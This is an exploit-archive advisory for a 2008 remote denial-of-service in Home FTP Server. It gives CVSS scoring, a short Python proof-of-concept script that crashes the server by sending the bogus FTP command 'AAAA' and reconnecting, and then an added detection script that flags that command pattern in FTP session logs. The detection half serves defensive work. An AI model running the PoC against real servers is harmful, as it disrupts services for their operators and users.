Home FTP Server DoS

2008.03.25
Credit: 0in
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Discovered by 0in from DaRk-CodeRs Programming & Security Group
# Contact: 0in(dot)email[at]gmail(dot)com
# That's a very funny bug, and nobody understands how it works ;]
# When we send a python FTP retrlines() function bad command and create
# a new connection server got DoS... o0
# That's not overflow, it's probably in logic application.
# Greetings to all DaRk-CodeRs Members:
# Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
# Special THX to: Rade0n3900
# Debug:
#  ----------------------
# | EIP: 0100FE98        |
# | DS:[00FFFFED4]=???   |
# | ECX: 0100FED4        |
#  ----------------------
from ftplib import FTP
import time

ip="127.0.0.1"
login="anonymous"
passwd = 'gorion (at) scriptkiddie (dot) pl [email concealed]'

print '-------------------------------'
print '| HOME FTP SERVER DoS Exploit |'
print '| bY 0in From Dark-Coders!    |'
print '|>>http://dark-coders.4rh.eu<<|'
print '-------------------------------'
print 'connecting...'
ftp=FTP(ip)
ftp.login(login,passwd)
print 'sending...'
try:
    ftp.retrlines("AAAA")
except Exception:
    print 'ok!\nreconnecting...'
    ftp=FTP(ip)
    ftp.quit()
    print 'DosEd'
#EoFF
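
For detection, note that ftplib's retrlines() sends TYPE A and negotiates a data channel (PASV by default) before it sends the command string, so the PoC's control-channel trace ends with a data-channel setup followed by an unrecognised verb. The following is an added example, not code from the advisory or its author, that flags that pattern. The (session_id, command_line) event format and the sample sessions are assumptions constructed for illustration.

```python
# Added example: flag FTP sessions in which a data channel is negotiated
# and the very next control-channel verb is not a known FTP command.
KNOWN_VERBS = {
    # RFC 959 commands
    "USER", "PASS", "ACCT", "CWD", "CDUP", "SMNT", "QUIT", "REIN", "PORT",
    "PASV", "TYPE", "STRU", "MODE", "RETR", "STOR", "STOU", "APPE", "ALLO",
    "REST", "RNFR", "RNTO", "ABOR", "DELE", "RMD", "MKD", "PWD", "LIST",
    "NLST", "SITE", "SYST", "STAT", "HELP", "NOOP",
    # common extensions
    "FEAT", "OPTS", "EPSV", "EPRT", "SIZE", "MDTM", "MLSD", "MLST",
}
DATA_SETUP = {"PASV", "EPSV", "PORT", "EPRT"}


def verb_of(line):
    """Return the upper-cased command verb of a control-channel line."""
    parts = line.strip().split(None, 1)
    return parts[0].upper() if parts else ""


def find_suspect_sessions(events):
    """events: iterable of (session_id, client_command_line) in arrival order.
    Returns [(session_id, offending_verb), ...]."""
    pending = set()   # sessions that have just negotiated a data channel
    hits = []
    for sid, line in events:
        verb = verb_of(line)
        if verb in DATA_SETUP:
            pending.add(sid)
            continue
        if sid in pending:
            pending.discard(sid)
            if verb not in KNOWN_VERBS:
                hits.append((sid, verb))
    return hits


# Constructed sample: s1 is a normal listing, s2 matches the PoC's trace.
SAMPLE = [
    ("s1", "USER anonymous"), ("s1", "PASS guest@example.invalid"),
    ("s1", "TYPE A"), ("s1", "PASV"), ("s1", "LIST"), ("s1", "QUIT"),
    ("s2", "USER anonymous"), ("s2", "PASS guest@example.invalid"),
    ("s2", "TYPE A"), ("s2", "PASV"), ("s2", "AAAA"),
    ("s3", "USER anonymous"),
]

if __name__ == "__main__":
    for sid, verb in find_suspect_sessions(SAMPLE):
        print(f"session {sid}: unknown verb {verb!r} after data-channel setup")
```
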


Copyright 2024, cxsecurity.com

 
